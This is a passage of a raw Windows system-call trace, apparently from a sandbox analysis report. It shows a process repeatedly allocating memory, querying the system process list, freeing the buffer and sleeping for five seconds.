NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.204] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.224] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.233] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.252] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.262] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.272] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.281] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.292] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.303] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.312] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.321] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.331] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.340] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.351] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.361] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.380] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.389] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.398] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.407] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 